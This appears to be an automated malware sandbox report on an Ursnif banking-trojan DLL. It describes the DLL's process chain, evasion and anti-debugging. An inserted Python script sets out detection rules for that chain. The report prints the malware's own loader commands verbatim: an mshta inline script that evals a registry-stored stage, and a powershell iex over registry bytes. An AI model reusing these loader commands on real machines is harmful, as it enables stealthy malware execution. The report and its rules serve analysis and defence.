Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3416 -s 648
Searches for the Microsoft Outlook file path
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Uses 32bit PE files
Source: lj3H69Z3Io.dll Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: classification engine Classification label: mal96.troj.evad.winDLL@26/21@3/1
Source: C:\Program Files\internet explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3416
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5064:120:WilError_01
Source: C:\Windows\SysWOW64\WerFault.exe File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER2A24.tmp
Source: lj3H69Z3Io.dll Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Program Files\internet explorer\iexplore.exe File read: C:\Users\desktop.ini
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\SysWOW64\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\lj3H69Z3Io.dll,Busysection
Source: lj3H69Z3Io.dll Virustotal: Detection: 41%
Source: lj3H69Z3Io.dll ReversingLabs: Detection: 31%
Source: unknown Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\lj3H69Z3Io.dll'
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\lj3H69Z3Io.dll',#1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\lj3H69Z3Io.dll,Busysection
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\lj3H69Z3Io.dll',#1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\lj3H69Z3Io.dll,Dealthis
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\lj3H69Z3Io.dll,Sing
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\lj3H69Z3Io.dll,Teethshould
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3416 -s 648
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3416 -s 656
Source: unknown Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:996 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:996 CREDAT:82950 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:996 CREDAT:17430 /prefetch:2
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Ff7t='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ff7t).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
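The process list above is the chain a detection engineer wants to catch: mshta started from an `about:` HTA whose inline script regread()s its next stage, powershell running `iex` over bytes pulled from the same registry key, and rundll32 calling named exports (or `#1`) of a DLL under the user profile. The following Python is an added example, not the Sigma rules Joe Sandbox fired (two of their titles are reused, the match logic is my own). The events are constructed from the command lines in this report; Sysmon event 1 field names are assumed for the log source, and every PID except 3416 (the crashing rundll32, from the WerFault line) is invented.

```python
"""Process-creation rules for the execution chain in this report.

Added example, not the Sigma rules Joe Sandbox fired: two rule titles are reused,
the match logic is my own.  Events are constructed from the 'Process created'
lines of the report; field names follow Sysmon event 1 (Image, ParentImage,
CommandLine, ProcessId, ParentProcessId), an assumption about the log source.
"""
import re
from typing import Callable, Dict, List, Tuple

Event = Dict[str, object]
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
          "rundll32.exe", "regsvr32.exe", "mshta.exe"}


def _base(path: object) -> str:
    return str(path).rsplit("\\", 1)[-1].lower()


def mshta_spawns_shell(ev: Event) -> bool:
    return _base(ev["ParentImage"]) == "mshta.exe" and _base(ev["Image"]) in SHELLS


def inline_hta_reads_registry(ev: Event) -> bool:
    # 'about:' HTA whose inline <script> regread()s its next stage from the registry
    cl = str(ev["CommandLine"]).lower()
    return _base(ev["Image"]) == "mshta.exe" and "about:" in cl and "<script>" in cl and "regread(" in cl


def iex_from_registry(ev: Event) -> bool:
    # iex over bytes pulled from a registry value, as in this report's powershell line
    cl = str(ev["CommandLine"]).lower()
    return (_base(ev["Image"]) == "powershell.exe"
            and re.search(r"\biex\b|invoke-expression", cl) is not None
            and re.search(r"\bgp\b|get-itemproperty|hkcu:|hklm:", cl) is not None
            and "getstring(" in cl)


def rundll32_dll_under_users(ev: Event) -> bool:
    # rundll32 calling an export (name or #ordinal) of a DLL in a user profile; noisy, hunt-only
    cl = str(ev["CommandLine"])
    return _base(ev["Image"]) == "rundll32.exe" and re.search(r"\\users\\[^,]+?\.dll['\"]?\s*,", cl, re.I) is not None


RULES: List[Tuple[str, Callable[[Event], bool]]] = [
    ("MSHTA Spawning Windows Shell", mshta_spawns_shell),
    ("Inline HTA reading its payload from the registry", inline_hta_reads_registry),
    ("Suspicious powershell command line found", iex_from_registry),
    ("rundll32 invoking a DLL export from a user profile path", rundll32_dll_under_users),
]


def evaluate(events: List[Event]) -> List[Tuple[str, int]]:
    """Return (rule title, ProcessId) for every event a rule matches."""
    return [(title, int(ev["ProcessId"])) for ev in events for title, rule in RULES if rule(ev)]


def ancestry(events: List[Event], pid: int) -> List[str]:
    """Image basenames from the root of the tree down to pid, for triage context."""
    by_pid = {int(ev["ProcessId"]): ev for ev in events}
    chain: List[str] = []
    while pid in by_pid:
        chain.append(_base(by_pid[pid]["Image"]))
        pid = int(by_pid[pid]["ParentProcessId"])
    return chain[::-1]


def _ev(pid: int, ppid: int, parent: str, image: str, cmdline: str) -> Event:
    return {"ProcessId": pid, "ParentProcessId": ppid, "ParentImage": parent, "Image": image, "CommandLine": cmdline}


# Constructed events mirroring the report's process tree (command lines copied; PIDs other than 3416 invented).
EVENTS: List[Event] = [
    _ev(100, 1, "unknown", r"C:\Windows\System32\loaddll32.exe", r"loaddll32.exe 'C:\Users\user\Desktop\lj3H69Z3Io.dll'"),
    _ev(101, 100, r"C:\Windows\System32\loaddll32.exe", r"C:\Windows\SysWOW64\cmd.exe", r"cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\lj3H69Z3Io.dll',#1"),
    _ev(102, 101, r"C:\Windows\SysWOW64\cmd.exe", r"C:\Windows\SysWOW64\rundll32.exe", r"rundll32.exe 'C:\Users\user\Desktop\lj3H69Z3Io.dll',#1"),
    _ev(3416, 100, r"C:\Windows\System32\loaddll32.exe", r"C:\Windows\SysWOW64\rundll32.exe", r"rundll32.exe C:\Users\user\Desktop\lj3H69Z3Io.dll,Busysection"),
    _ev(103, 3416, r"C:\Windows\SysWOW64\rundll32.exe", r"C:\Windows\SysWOW64\WerFault.exe", r"C:\Windows\SysWOW64\WerFault.exe -u -p 3416 -s 648"),
    _ev(200, 1, "unknown", r"C:\Windows\System32\mshta.exe", r"'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Ff7t='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ff7t).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'"),
    _ev(201, 200, r"C:\Windows\System32\mshta.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", r"'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))"),
    _ev(202, 201, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", r"C:\Windows\System32\conhost.exe", r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
]

if __name__ == "__main__":
    for title, pid in evaluate(EVENTS):
        print(f"{pid:>5}  {' > '.join(ancestry(EVENTS, pid))}\n       {title}")
```

Two of the four rules (the mshta-to-shell parent relation and the `about:` HTA with `regread(`) are tight enough to alert on; the rundll32 rule is for hunting, since installers legitimately call exports of DLLs under Users. Note that the mshta process has no recorded parent in the report, which is how a Run-key launch looks in a sandbox; the inline-HTA rule catches it without needing the parent.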
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
Source: C:\Windows\SysWOW64\rundll32.exe Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe Automated click: OK
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
Source: lj3H69Z3Io.dll Static PE information: DYNAMIC_BASE, NX_COMPAT
Source: lj3H69Z3Io.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp
Source: Binary string: setupapi.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
Source: Binary string: imagehlp.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
Source: Binary string: upwntdll.pdb source: WerFault.exe, 00000014.00000002.436609525.0000000004DF9000.00000004.00000001.sdmp
Source: Binary string: winspool.pdb! source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
Source: Binary string: shcore.pdbk source: WerFault.exe, 00000014.00000003.418696334.0000000005370000.00000004.00000040.sdmp
Source: Binary string: profapi.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
Source: Binary string: winspool.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp
Source: Binary string: sechost.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
Source: Binary string: iphlpapi.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
Source: Binary string: propsys.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
Source: Binary string: cfgmgr32.pdbk source: WerFault.exe, 00000014.00000003.418696334.0000000005370000.00000004.00000040.sdmp
Source: Binary string: c:\201\Their\Quart-Sheet\497_who\Bed.pdb source: rundll32.exe, 00000002.00000002.444299096.000000006E191000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.616072901.000000006E191000.00000002.00020000.sdmp, WerFault.exe, 00000014.00000003.411602089.0000000004DE1000.00000004.00000001.sdmp, lj3H69Z3Io.dll
Source: Binary string: powrprof.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
Source: Binary string: netapi32.pdbD source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
Source: Binary string: ole32.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
Source: Binary string: AcLayers.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp
Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000014.00000003.418696334.0000000005370000.00000004.00000040.sdmp
Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
Source: Binary string: netapi32.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000014.00000003.418696334.0000000005370000.00000004.00000040.sdmp
Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000014.00000003.418696334.0000000005370000.00000004.00000040.sdmp
Source: Binary string: combase.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000014.00000003.418696334.0000000005370000.00000004.00000040.sdmp
Source: Binary string: rundll32.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp
Source: Binary string: wtsapi32.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
Source: Binary string: iphlpapi.pdb' source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
Source: Binary string: sfc_os.pdbS source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
Source: Binary string: sfc.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
Source: Binary string: apphelp.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp
Source: Binary string: wuser32.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdbk source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp
Source: Binary string: c:\201\Their\Quart-Sheet\497_who\Bed.pdbbj source: WerFault.exe, 00000014.00000003.412073889.0000000004DB5000.00000004.00000001.sdmp
Source: Binary string: netutils.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
Source: Binary string: Nc:\201\Their\Quart-Sheet\497_who\Bed.pdb source: WerFault.exe, 00000014.00000003.411494273.0000000004E04000.00000004.00000001.sdmp

Data Obfuscation:

Suspicious powershell command line found
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E141F7C LoadLibraryA,GetProcAddress, 3_2_6E141F7C
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_6E17446D push ecx; ret 2_2_6E174480
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_6E142D07 push ebp; ret 2_2_6E142D17
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_6E174AC6 push ecx; ret 2_2_6E174AD9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E142200 push ecx; ret 3_2_6E142209
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E142253 push ecx; ret 3_2_6E142263
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E17446D push ecx; ret 3_2_6E174480
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E174AC6 push ecx; ret 3_2_6E174AD9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E1BF506 push ds; ret 3_2_6E1BF508

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif
Source: Yara match File source: 3.3.rundll32.exe.4f594a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000003.556259843.0000000004DDC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.537141120.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.537104299.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.536940847.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.548180639.0000000004F59000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.537188735.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.537165510.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.537047715.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.536909133.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.536969040.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\SysWOW64\rundll32.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3118
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1592
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2000 Thread sleep time: -922337203685477s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\loaddll32.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_6E188626 FindFirstFileExA, 2_2_6E188626
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: WerFault.exe, 00000014.00000002.439272427.0000000005490000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: mshta.exe, 00000029.00000002.587051419.0000023411E24000.00000004.00000001.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b8b}>'>B
Source: WerFault.exe, 00000014.00000002.438909171.0000000005107000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: WerFault.exe, 00000014.00000002.439272427.0000000005490000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: WerFault.exe, 00000014.00000002.439272427.0000000005490000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: WerFault.exe, 00000014.00000002.439272427.0000000005490000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation

Anti Debugging:

Checks if the current process is being debugged
Source: C:\Windows\SysWOW64\rundll32.exe Process queried: DebugPort
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_6E141EB0 LdrInitializeThunk,LdrInitializeThunk,VirtualProtect,GetWindowsDirectoryA, 2_2_6E141EB0
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_6E17875F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_6E17875F
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E141F7C LoadLibraryA,GetProcAddress, 3_2_6E141F7C
Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_6E17DF99 mov eax, dword ptr fs:[00000030h] 2_2_6E17DF99
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E17DF99 mov eax, dword ptr fs:[00000030h] 3_2_6E17DF99
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E1BD8B6 mov eax, dword ptr fs:[00000030h] 3_2_6E1BD8B6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E1BD3EC push dword ptr fs:[00000030h] 3_2_6E1BD3EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E1BD7E5 mov eax, dword ptr fs:[00000030h] 3_2_6E1BD7E5
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_6E17462D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 2_2_6E17462D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_6E17875F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_6E17875F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_6E174901 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_6E174901
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E17462D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 3_2_6E17462D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E17875F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_6E17875F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E174901 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_6E174901

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\lj3H69Z3Io.dll',#1
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Ff7t='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ff7t).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
Source: rundll32.exe, 00000002.00000000.404396366.0000000002ED0000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.610195146.0000000002CD0000.00000002.00000001.sdmp, powershell.exe, 0000002A.00000002.609722055.00000273C7180000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: rundll32.exe, 00000002.00000000.404396366.0000000002ED0000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.610195146.0000000002CD0000.00000002.00000001.sdmp, powershell.exe, 0000002A.00000002.609722055.00000273C7180000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: rundll32.exe, 00000002.00000000.404396366.0000000002ED0000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.610195146.0000000002CD0000.00000002.00000001.sdmp, powershell.exe, 0000002A.00000002.609722055.00000273C7180000.00000002.00000001.sdmp Binary or memory string: Progman
Source: rundll32.exe, 00000002.00000000.404396366.0000000002ED0000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.610195146.0000000002CD0000.00000002.00000001.sdmp, powershell.exe, 0000002A.00000002.609722055.00000273C7180000.00000002.00000001.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_6E174ADB cpuid 2_2_6E174ADB
Contains functionality to query locales information (e.g. system language)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 2_2_6E18C3CB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 2_2_6E18C643
Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 2_2_6E18C68E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 2_2_6E18C729
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 2_2_6E18C7B6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW, 2_2_6E18CC36
Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 2_2_6E1834FA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 2_2_6E18CD03
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW, 2_2_6E18C59A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW, 2_2_6E18CA06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 2_2_6E18CB2F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW, 2_2_6E183961
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA, 3_2_6E141E8A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 3_2_6E18C3CB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 3_2_6E18C643
Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 3_2_6E18C68E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 3_2_6E18C729
Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 3_2_6E1834FA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 3_2_6E18CD03
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 3_2_6E18CB2F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW, 3_2_6E183961
Queries the installation date of Windows
